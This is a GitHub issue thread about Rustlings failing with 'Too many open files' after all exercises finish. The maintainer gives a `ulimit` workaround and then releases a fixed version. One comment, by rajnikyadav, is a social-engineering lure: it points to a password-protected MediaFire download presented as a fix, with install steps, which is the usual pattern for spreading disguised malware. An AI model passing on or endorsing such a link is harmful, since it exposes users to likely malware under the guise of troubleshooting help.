### ISSUE TITLE
Failed to recompiling and running all exercises after all exercises done with error "Too many open files (os error 24)"

### ISSUE THREAD

**Issue by hanhiver** [rust-lang/rustlings#2091]
After I finish all the exercises, rustling will recompiling and running all exercises to make sure that all of them are actually done. However, wait for few minutes, rustlings complain that failed to run the command `cargo build ...`, and the reason is: Too many open files (os error 24). 

<img width="945" alt="image" src="https://github.com/user-attachments/assets/dbfaced0-b964-4668-8ff1-5378a188483c">

system: Darwin dhan-m3.local 23.6.0 Darwin Kernel Version 23.6.0: Mon Jul 29 21:14:30 PDT 2024; root:xnu-10063.141.2~1/RELEASE_ARM64_T6030 arm64

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mo8it** [comment]
Oh, I will fix this today and publish a new version.

**Comment by mo8it** [comment]
Until then, you can run `ulimit -n 2048` and start running Rustlings again.

**Comment by mo8it** [comment]
I just published a new version which fixes this issue. Please install it using `cargo install rustlings` and then try again on the same exercises :D
(You don't need to start over)

**Comment by hanhiver** [comment]
> Until then, you can run `ulimit -n 2048` and start running Rustlings again.

Yes, it works! Thanks a lot and wait for the final fix.

**Comment by mo8it** [comment]
@hanhiver As I said, the fix is published. Please run `cargo install rustlings` and try again eithout using `ulimit`.
